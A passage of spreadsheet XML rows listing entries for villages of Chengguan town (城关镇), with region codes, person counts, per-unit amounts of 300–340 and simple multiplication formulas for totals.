      <c r="H680" s="14">
        <v>340</v>
      </c>
      <c r="I680" s="14">
        <f t="shared" si="28"/>
        <v>340</v>
      </c>
      <c r="J680" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K680" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="681" ht="23" customHeight="1" spans="1:11">
      <c r="A681" s="13" t="s">
        <v>1838</v>
      </c>
      <c r="B681" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C681" s="14" t="s">
        <v>1739</v>
      </c>
      <c r="D681" s="14" t="s">
        <v>1839</v>
      </c>
      <c r="E681" s="14" t="s">
        <v>249</v>
      </c>
      <c r="F681" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G681" s="14">
        <v>1</v>
      </c>
      <c r="H681" s="14">
        <v>340</v>
      </c>
      <c r="I681" s="14">
        <f t="shared" si="28"/>
        <v>340</v>
      </c>
      <c r="J681" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K681" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="682" ht="23" customHeight="1" spans="1:11">
      <c r="A682" s="13" t="s">
        <v>1840</v>
      </c>
      <c r="B682" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C682" s="14" t="s">
        <v>1739</v>
      </c>
      <c r="D682" s="14" t="s">
        <v>1841</v>
      </c>
      <c r="E682" s="14" t="s">
        <v>392</v>
      </c>
      <c r="F682" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G682" s="14">
        <v>1</v>
      </c>
      <c r="H682" s="14">
        <v>340</v>
      </c>
      <c r="I682" s="14">
        <f t="shared" si="28"/>
        <v>340</v>
      </c>
      <c r="J682" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K682" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="683" ht="23" customHeight="1" spans="1:11">
      <c r="A683" s="13" t="s">
        <v>1842</v>
      </c>
      <c r="B683" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C683" s="14" t="s">
        <v>1739</v>
      </c>
      <c r="D683" s="14" t="s">
        <v>1843</v>
      </c>
      <c r="E683" s="14" t="s">
        <v>548</v>
      </c>
      <c r="F683" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G683" s="14">
        <v>1</v>
      </c>
      <c r="H683" s="14">
        <v>340</v>
      </c>
      <c r="I683" s="14">
        <f t="shared" si="28"/>
        <v>340</v>
      </c>
      <c r="J683" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K683" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="684" ht="23" customHeight="1" spans="1:11">
      <c r="A684" s="13" t="s">
        <v>1844</v>
      </c>
      <c r="B684" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C684" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D684" s="14" t="s">
        <v>1845</v>
      </c>
      <c r="E684" s="14" t="s">
        <v>883</v>
      </c>
      <c r="F684" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G684" s="14">
        <v>1</v>
      </c>
      <c r="H684" s="14">
        <v>340</v>
      </c>
      <c r="I684" s="14">
        <f t="shared" si="28"/>
        <v>340</v>
      </c>
      <c r="J684" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K684" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="685" ht="23" customHeight="1" spans="1:11">
      <c r="A685" s="13" t="s">
        <v>1846</v>
      </c>
      <c r="B685" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C685" s="14" t="s">
        <v>1847</v>
      </c>
      <c r="D685" s="14" t="s">
        <v>1848</v>
      </c>
      <c r="E685" s="14" t="s">
        <v>1758</v>
      </c>
      <c r="F685" s="14" t="s">
        <v>1231</v>
      </c>
      <c r="G685" s="14">
        <v>2</v>
      </c>
      <c r="H685" s="14">
        <v>320</v>
      </c>
      <c r="I685" s="14">
        <f t="shared" si="28"/>
        <v>640</v>
      </c>
      <c r="J685" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K685" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="686" ht="23" customHeight="1" spans="1:11">
      <c r="A686" s="13" t="s">
        <v>1849</v>
      </c>
      <c r="B686" s="14" t="str">
        <f>B685</f>
        <v>城关镇</v>
      </c>
      <c r="C686" s="14" t="str">
        <f>C685</f>
        <v>城关沙坪</v>
      </c>
      <c r="D686" s="18" t="s">
        <v>1850</v>
      </c>
      <c r="E686" s="18" t="s">
        <v>1702</v>
      </c>
      <c r="F686" s="14" t="str">
        <f>F685</f>
        <v>4113210101</v>
      </c>
      <c r="G686" s="14"/>
      <c r="H686" s="14"/>
      <c r="I686" s="14"/>
      <c r="J686" s="14"/>
      <c r="K686" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="687" ht="23" customHeight="1" spans="1:11">
      <c r="A687" s="13" t="s">
        <v>1851</v>
      </c>
      <c r="B687" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C687" s="14" t="s">
        <v>1852</v>
      </c>
      <c r="D687" s="14" t="s">
        <v>1853</v>
      </c>
      <c r="E687" s="14" t="s">
        <v>1854</v>
      </c>
      <c r="F687" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G687" s="14">
        <v>1</v>
      </c>
      <c r="H687" s="14">
        <v>340</v>
      </c>
      <c r="I687" s="14">
        <f t="shared" ref="I687:I700" si="29">H687*G687</f>
        <v>340</v>
      </c>
      <c r="J687" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K687" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="688" ht="23" customHeight="1" spans="1:11">
      <c r="A688" s="13" t="s">
        <v>1855</v>
      </c>
      <c r="B688" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C688" s="14" t="s">
        <v>1852</v>
      </c>
      <c r="D688" s="14" t="s">
        <v>1856</v>
      </c>
      <c r="E688" s="14" t="s">
        <v>249</v>
      </c>
      <c r="F688" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G688" s="14">
        <v>1</v>
      </c>
      <c r="H688" s="14">
        <v>340</v>
      </c>
      <c r="I688" s="14">
        <f t="shared" si="29"/>
        <v>340</v>
      </c>
      <c r="J688" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K688" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="689" ht="23" customHeight="1" spans="1:11">
      <c r="A689" s="13" t="s">
        <v>1857</v>
      </c>
      <c r="B689" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C689" s="14" t="s">
        <v>1852</v>
      </c>
      <c r="D689" s="14" t="s">
        <v>1858</v>
      </c>
      <c r="E689" s="14" t="s">
        <v>916</v>
      </c>
      <c r="F689" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G689" s="14">
        <v>1</v>
      </c>
      <c r="H689" s="14">
        <v>340</v>
      </c>
      <c r="I689" s="14">
        <f t="shared" si="29"/>
        <v>340</v>
      </c>
      <c r="J689" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K689" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="690" ht="23" customHeight="1" spans="1:11">
      <c r="A690" s="13" t="s">
        <v>1859</v>
      </c>
      <c r="B690" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C690" s="14" t="s">
        <v>1852</v>
      </c>
      <c r="D690" s="14" t="s">
        <v>1860</v>
      </c>
      <c r="E690" s="14" t="s">
        <v>587</v>
      </c>
      <c r="F690" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G690" s="14">
        <v>1</v>
      </c>
      <c r="H690" s="14">
        <v>340</v>
      </c>
      <c r="I690" s="14">
        <f t="shared" si="29"/>
        <v>340</v>
      </c>
      <c r="J690" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K690" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="691" ht="23" customHeight="1" spans="1:11">
      <c r="A691" s="13" t="s">
        <v>1861</v>
      </c>
      <c r="B691" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C691" s="14" t="s">
        <v>1852</v>
      </c>
      <c r="D691" s="14" t="s">
        <v>1862</v>
      </c>
      <c r="E691" s="14" t="s">
        <v>1863</v>
      </c>
      <c r="F691" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G691" s="14">
        <v>1</v>
      </c>
      <c r="H691" s="14">
        <v>340</v>
      </c>
      <c r="I691" s="14">
        <f t="shared" si="29"/>
        <v>340</v>
      </c>
      <c r="J691" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K691" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="692" ht="23" customHeight="1" spans="1:11">
      <c r="A692" s="13" t="s">
        <v>1864</v>
      </c>
      <c r="B692" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C692" s="14" t="s">
        <v>1322</v>
      </c>
      <c r="D692" s="14" t="s">
        <v>1865</v>
      </c>
      <c r="E692" s="14" t="s">
        <v>408</v>
      </c>
      <c r="F692" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G692" s="14">
        <v>1</v>
      </c>
      <c r="H692" s="14">
        <v>340</v>
      </c>
      <c r="I692" s="14">
        <f t="shared" si="29"/>
        <v>340</v>
      </c>
      <c r="J692" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K692" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="693" ht="23" customHeight="1" spans="1:11">
      <c r="A693" s="13" t="s">
        <v>1866</v>
      </c>
      <c r="B693" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C693" s="14" t="s">
        <v>1322</v>
      </c>
      <c r="D693" s="14" t="s">
        <v>1867</v>
      </c>
      <c r="E693" s="14" t="s">
        <v>1868</v>
      </c>
      <c r="F693" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G693" s="14">
        <v>1</v>
      </c>
      <c r="H693" s="14">
        <v>340</v>
      </c>
      <c r="I693" s="14">
        <f t="shared" si="29"/>
        <v>340</v>
      </c>
      <c r="J693" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K693" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="694" ht="23" customHeight="1" spans="1:11">
      <c r="A694" s="13" t="s">
        <v>1869</v>
      </c>
      <c r="B694" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C694" s="14" t="s">
        <v>1322</v>
      </c>
      <c r="D694" s="14" t="s">
        <v>1870</v>
      </c>
      <c r="E694" s="14" t="s">
        <v>1082</v>
      </c>
      <c r="F694" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G694" s="14">
        <v>1</v>
      </c>
      <c r="H694" s="14">
        <v>340</v>
      </c>
      <c r="I694" s="14">
        <f t="shared" si="29"/>
        <v>340</v>
      </c>
      <c r="J694" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K694" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="695" ht="23" customHeight="1" spans="1:11">
      <c r="A695" s="13" t="s">
        <v>1871</v>
      </c>
      <c r="B695" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C695" s="14" t="s">
        <v>1322</v>
      </c>
      <c r="D695" s="14" t="s">
        <v>1872</v>
      </c>
      <c r="E695" s="14" t="s">
        <v>916</v>
      </c>
      <c r="F695" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G695" s="14">
        <v>1</v>
      </c>
      <c r="H695" s="14">
        <v>340</v>
      </c>
      <c r="I695" s="14">
        <f t="shared" si="29"/>
        <v>340</v>
      </c>
      <c r="J695" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K695" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="696" ht="23" customHeight="1" spans="1:11">
      <c r="A696" s="13" t="s">
        <v>1873</v>
      </c>
      <c r="B696" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C696" s="14" t="s">
        <v>1322</v>
      </c>
      <c r="D696" s="14" t="s">
        <v>1874</v>
      </c>
      <c r="E696" s="14" t="s">
        <v>292</v>
      </c>
      <c r="F696" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G696" s="14">
        <v>1</v>
      </c>
      <c r="H696" s="14">
        <v>340</v>
      </c>
      <c r="I696" s="14">
        <f t="shared" si="29"/>
        <v>340</v>
      </c>
      <c r="J696" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K696" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="697" ht="23" customHeight="1" spans="1:11">
      <c r="A697" s="13" t="s">
        <v>1875</v>
      </c>
      <c r="B697" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C697" s="14" t="s">
        <v>1876</v>
      </c>
      <c r="D697" s="14" t="s">
        <v>1877</v>
      </c>
      <c r="E697" s="14" t="s">
        <v>767</v>
      </c>
      <c r="F697" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G697" s="14">
        <v>1</v>
      </c>
      <c r="H697" s="14">
        <v>340</v>
      </c>
      <c r="I697" s="14">
        <f t="shared" si="29"/>
        <v>340</v>
      </c>
      <c r="J697" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K697" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="698" ht="23" customHeight="1" spans="1:11">
      <c r="A698" s="13" t="s">
        <v>1878</v>
      </c>
      <c r="B698" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C698" s="14" t="s">
        <v>1876</v>
      </c>
      <c r="D698" s="14" t="s">
        <v>1879</v>
      </c>
      <c r="E698" s="14" t="s">
        <v>1163</v>
      </c>
      <c r="F698" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G698" s="14">
        <v>1</v>
      </c>
      <c r="H698" s="14">
        <v>340</v>
      </c>
      <c r="I698" s="14">
        <f t="shared" si="29"/>
        <v>340</v>
      </c>
      <c r="J698" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K698" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="699" ht="23" customHeight="1" spans="1:11">
      <c r="A699" s="13" t="s">
        <v>1880</v>
      </c>
      <c r="B699" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C699" s="14" t="s">
        <v>1876</v>
      </c>
      <c r="D699" s="14" t="s">
        <v>1881</v>
      </c>
      <c r="E699" s="14" t="s">
        <v>502</v>
      </c>
      <c r="F699" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G699" s="14">
        <v>1</v>
      </c>
      <c r="H699" s="14">
        <v>340</v>
      </c>
      <c r="I699" s="14">
        <f t="shared" si="29"/>
        <v>340</v>
      </c>
      <c r="J699" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K699" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="700" ht="23" customHeight="1" spans="1:11">
      <c r="A700" s="13" t="s">
        <v>1882</v>
      </c>
      <c r="B700" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C700" s="14" t="s">
        <v>1876</v>
      </c>
      <c r="D700" s="14" t="s">
        <v>1883</v>
      </c>
      <c r="E700" s="14" t="s">
        <v>1884</v>
      </c>
      <c r="F700" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G700" s="14">
        <v>2</v>
      </c>
      <c r="H700" s="14">
        <v>300</v>
      </c>
      <c r="I700" s="14">
        <f t="shared" si="29"/>
        <v>600</v>
      </c>
      <c r="J700" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K700" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="701" ht="23" customHeight="1" spans="1:11">
      <c r="A701" s="13" t="s">
        <v>1885</v>
      </c>
      <c r="B701" s="14" t="str">
        <f>B700</f>
        <v>城关镇</v>
      </c>
      <c r="C701" s="14" t="str">
        <f>C700</f>
        <v>城关中华村</v>
      </c>
      <c r="D701" s="23" t="s">
        <v>1886</v>
      </c>
      <c r="E701" s="19" t="s">
        <v>1887</v>
      </c>
      <c r="F701" s="14" t="str">
        <f>F700</f>
        <v>4113210108</v>
      </c>
      <c r="G701" s="14"/>
      <c r="H701" s="14"/>
      <c r="I701" s="14"/>
      <c r="J701" s="14"/>
      <c r="K701" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="702" ht="23" customHeight="1" spans="1:11">
      <c r="A702" s="13" t="s">
        <v>1888</v>
      </c>
      <c r="B702" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C702" s="14" t="s">
        <v>1876</v>
      </c>
      <c r="D702" s="14" t="s">
        <v>1889</v>
      </c>
      <c r="E702" s="14" t="s">
        <v>239</v>
      </c>
      <c r="F702" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G702" s="14">
        <v>2</v>
      </c>
      <c r="H702" s="14">
        <v>300</v>
      </c>
      <c r="I702" s="14">
        <f>H702*G702</f>
        <v>600</v>
      </c>
      <c r="J702" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K702" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="703" ht="23" customHeight="1" spans="1:11">
      <c r="A703" s="13" t="s">
        <v>1890</v>
      </c>
      <c r="B703" s="14" t="str">
        <f>B702</f>
        <v>城关镇</v>
      </c>
      <c r="C703" s="14" t="str">
        <f>C702</f>
        <v>城关中华村</v>
      </c>
      <c r="D703" s="23" t="s">
        <v>1891</v>
      </c>
      <c r="E703" s="19" t="s">
        <v>1892</v>
      </c>
      <c r="F703" s="14" t="str">
        <f>F702</f>
        <v>4113210108</v>
      </c>
      <c r="G703" s="14"/>
      <c r="H703" s="14"/>
      <c r="I703" s="14"/>
      <c r="J703" s="14"/>
      <c r="K703" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="704" ht="23" customHeight="1" spans="1:11">
      <c r="A704" s="13" t="s">
        <v>1893</v>
      </c>
      <c r="B704" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C704" s="14" t="s">
        <v>1876</v>
      </c>
      <c r="D704" s="14" t="s">
        <v>1894</v>
      </c>
      <c r="E704" s="14" t="s">
        <v>284</v>
      </c>
      <c r="F704" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G704" s="14">
        <v>1</v>
      </c>
      <c r="H704" s="14">
        <v>340</v>
      </c>
      <c r="I704" s="14">
        <f t="shared" ref="I704:I711" si="30">H704*G704</f>
        <v>340</v>
      </c>
      <c r="J704" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K704" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="705" ht="23" customHeight="1" spans="1:11">
      <c r="A705" s="13" t="s">
        <v>1895</v>
      </c>
      <c r="B705" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C705" s="14" t="s">
        <v>1876</v>
      </c>
      <c r="D705" s="14" t="s">
        <v>1896</v>
      </c>
      <c r="E705" s="14" t="s">
        <v>1730</v>
      </c>
      <c r="F705" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G705" s="14">
        <v>1</v>
      </c>
      <c r="H705" s="14">
        <v>340</v>
      </c>
      <c r="I705" s="14">
        <f t="shared" si="30"/>
        <v>340</v>
      </c>
      <c r="J705" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K705" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="706" ht="23" customHeight="1" spans="1:11">
      <c r="A706" s="13" t="s">
        <v>1897</v>
      </c>
      <c r="B706" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C706" s="14" t="s">
        <v>1898</v>
      </c>
      <c r="D706" s="14" t="s">
        <v>1899</v>
      </c>
      <c r="E706" s="14" t="s">
        <v>306</v>
      </c>
      <c r="F706" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G706" s="14">
        <v>1</v>
      </c>
      <c r="H706" s="14">
        <v>340</v>
      </c>
      <c r="I706" s="14">
        <f t="shared" si="30"/>
        <v>340</v>
      </c>
      <c r="J706" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K706" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="707" ht="23" customHeight="1" spans="1:11">
      <c r="A707" s="13" t="s">
        <v>1900</v>
      </c>
      <c r="B707" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C707" s="14" t="s">
        <v>1898</v>
      </c>
      <c r="D707" s="14" t="s">
        <v>1901</v>
      </c>
      <c r="E707" s="14" t="s">
        <v>1902</v>
      </c>
      <c r="F707" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G707" s="14">
        <v>1</v>
      </c>
      <c r="H707" s="14">
        <v>340</v>
      </c>
      <c r="I707" s="14">
        <f t="shared" si="30"/>
        <v>340</v>
      </c>
      <c r="J707" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K707" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="708" ht="23" customHeight="1" spans="1:11">
      <c r="A708" s="13" t="s">
        <v>1903</v>
      </c>
      <c r="B708" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C708" s="14" t="s">
        <v>1722</v>
      </c>
      <c r="D708" s="14" t="s">
        <v>1904</v>
      </c>
      <c r="E708" s="14" t="s">
        <v>1905</v>
      </c>
      <c r="F708" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G708" s="14">
        <v>1</v>
      </c>
      <c r="H708" s="14">
        <v>340</v>
      </c>
      <c r="I708" s="14">
        <f t="shared" si="30"/>
        <v>340</v>
      </c>
      <c r="J708" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K708" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="709" ht="23" customHeight="1" spans="1:11">
      <c r="A709" s="13" t="s">
        <v>1906</v>
      </c>
      <c r="B709" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C709" s="14" t="s">
        <v>1739</v>
      </c>
      <c r="D709" s="14" t="s">
        <v>1907</v>
      </c>
      <c r="E709" s="14" t="s">
        <v>1908</v>
      </c>
      <c r="F709" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G709" s="14">
        <v>1</v>
      </c>
      <c r="H709" s="14">
        <v>340</v>
      </c>
      <c r="I709" s="14">
        <f t="shared" si="30"/>
        <v>340</v>
      </c>
      <c r="J709" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K709" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="710" ht="23" customHeight="1" spans="1:11">
      <c r="A710" s="13" t="s">
        <v>1909</v>
      </c>
      <c r="B710" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C710" s="14" t="s">
        <v>1722</v>
      </c>
      <c r="D710" s="14" t="s">
        <v>1910</v>
      </c>
      <c r="E710" s="14" t="s">
        <v>1911</v>
      </c>
      <c r="F710" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G710" s="14">
        <v>1</v>
      </c>
      <c r="H710" s="14">
        <v>340</v>
      </c>
      <c r="I710" s="14">
        <f t="shared" si="30"/>
        <v>340</v>
      </c>
      <c r="J710" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K710" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="711" ht="23" customHeight="1" spans="1:11">
      <c r="A711" s="13" t="s">
        <v>1912</v>
      </c>
      <c r="B711" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C711" s="14" t="s">
        <v>1852</v>
      </c>
      <c r="D711" s="14" t="s">
        <v>1913</v>
      </c>
      <c r="E711" s="14" t="s">
        <v>1281</v>
      </c>
      <c r="F711" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G711" s="14">
        <v>2</v>
      </c>
      <c r="H711" s="14">
        <v>300</v>
      </c>
      <c r="I711" s="14">
        <f t="shared" si="30"/>
        <v>600</v>
      </c>
      <c r="J711" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K711" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="712" ht="23" customHeight="1" spans="1:11">
      <c r="A712" s="13" t="s">
        <v>1914</v>
      </c>
      <c r="B712" s="14" t="str">
        <f>B711</f>
        <v>城关镇</v>
      </c>
      <c r="C712" s="14" t="str">
        <f>C711</f>
        <v>城关东北村</v>
      </c>
      <c r="D712" s="23" t="s">
        <v>1915</v>
      </c>
      <c r="E712" s="19" t="s">
        <v>1916</v>
      </c>
      <c r="F712" s="14" t="str">
        <f>F711</f>
        <v>4113210103</v>
      </c>
      <c r="G712" s="14"/>
      <c r="H712" s="14"/>
      <c r="I712" s="14"/>
      <c r="J712" s="14"/>
      <c r="K712" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="713" ht="23" customHeight="1" spans="1:11">
      <c r="A713" s="13" t="s">
        <v>1917</v>
      </c>
      <c r="B713" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C713" s="14" t="s">
        <v>1237</v>
      </c>
      <c r="D713" s="14" t="s">
        <v>1918</v>
      </c>
      <c r="E713" s="17" t="s">
        <v>1919</v>
      </c>
      <c r="F713" s="14" t="s">
        <v>1231</v>
      </c>
      <c r="G713" s="14">
        <v>1</v>
      </c>
      <c r="H713" s="14">
        <v>340</v>
      </c>
      <c r="I713" s="14">
        <f t="shared" ref="I713:I719" si="31">H713*G713</f>
        <v>340</v>
      </c>
      <c r="J713" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K713" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="714" ht="23" customHeight="1" spans="1:11">
      <c r="A714" s="13" t="s">
        <v>1920</v>
      </c>
      <c r="B714" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C714" s="14" t="s">
        <v>1813</v>
      </c>
      <c r="D714" s="14" t="s">
        <v>1921</v>
      </c>
      <c r="E714" s="14" t="s">
        <v>438</v>
      </c>
      <c r="F714" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G714" s="14">
        <v>1</v>
      </c>
      <c r="H714" s="14">
        <v>340</v>
      </c>
      <c r="I714" s="14">
        <f t="shared" si="31"/>
        <v>340</v>
      </c>
      <c r="J714" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K714" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="715" ht="23" customHeight="1" spans="1:11">
      <c r="A715" s="13" t="s">
        <v>1922</v>
      </c>
      <c r="B715" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C715" s="14" t="s">
        <v>1739</v>
      </c>
      <c r="D715" s="14" t="s">
        <v>1923</v>
      </c>
      <c r="E715" s="14" t="s">
        <v>303</v>
      </c>
      <c r="F715" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G715" s="14">
        <v>1</v>
      </c>
      <c r="H715" s="14">
        <v>340</v>
      </c>
      <c r="I715" s="14">
        <f t="shared" si="31"/>
        <v>340</v>
      </c>
      <c r="J715" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K715" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="716" ht="23" customHeight="1" spans="1:11">
      <c r="A716" s="13" t="s">
        <v>1924</v>
      </c>
      <c r="B716" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C716" s="14" t="s">
        <v>1739</v>
      </c>
      <c r="D716" s="14" t="s">
        <v>1925</v>
      </c>
      <c r="E716" s="14" t="s">
        <v>1926</v>
      </c>
      <c r="F716" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G716" s="14">
        <v>1</v>
      </c>
      <c r="H716" s="14">
        <v>340</v>
      </c>
      <c r="I716" s="14">
        <f t="shared" si="31"/>
        <v>340</v>
      </c>
      <c r="J716" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K716" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="717" ht="23" customHeight="1" spans="1:11">
      <c r="A717" s="13" t="s">
        <v>1927</v>
      </c>
      <c r="B717" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C717" s="14" t="s">
        <v>1714</v>
      </c>
      <c r="D717" s="14" t="s">
        <v>1928</v>
      </c>
      <c r="E717" s="14" t="s">
        <v>532</v>
      </c>
      <c r="F717" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G717" s="14">
        <v>1</v>
      </c>
      <c r="H717" s="14">
        <v>340</v>
      </c>
      <c r="I717" s="14">
        <f t="shared" si="31"/>
        <v>340</v>
      </c>
      <c r="J717" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K717" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="718" ht="23" customHeight="1" spans="1:11">
      <c r="A718" s="13" t="s">
        <v>1929</v>
      </c>
      <c r="B718" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C718" s="14" t="s">
        <v>1714</v>
      </c>
      <c r="D718" s="14" t="s">
        <v>1930</v>
      </c>
      <c r="E718" s="14" t="s">
        <v>1931</v>
      </c>
      <c r="F718" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G718" s="14">
        <v>1</v>
      </c>
      <c r="H718" s="14">
        <v>340</v>
      </c>
      <c r="I718" s="14">
        <f t="shared" si="31"/>
        <v>340</v>
      </c>
      <c r="J718" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K718" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="719" ht="23" customHeight="1" spans="1:11">
      <c r="A719" s="13" t="s">
        <v>1932</v>
      </c>
      <c r="B719" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C719" s="14" t="s">
        <v>1933</v>
      </c>
      <c r="D719" s="14" t="s">
        <v>1934</v>
      </c>
      <c r="E719" s="14" t="s">
        <v>1935</v>
      </c>
      <c r="F719" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G719" s="14">
        <v>2</v>
      </c>
      <c r="H719" s="14">
        <v>330</v>
      </c>
      <c r="I719" s="14">
        <f t="shared" si="31"/>
        <v>660</v>
      </c>
      <c r="J719" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K719" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="720" ht="23" customHeight="1" spans="1:11">
      <c r="A720" s="13" t="s">
        <v>1936</v>
      </c>
      <c r="B720" s="14" t="str">
        <f>B719</f>
        <v>城关镇</v>
      </c>
      <c r="C720" s="14" t="str">
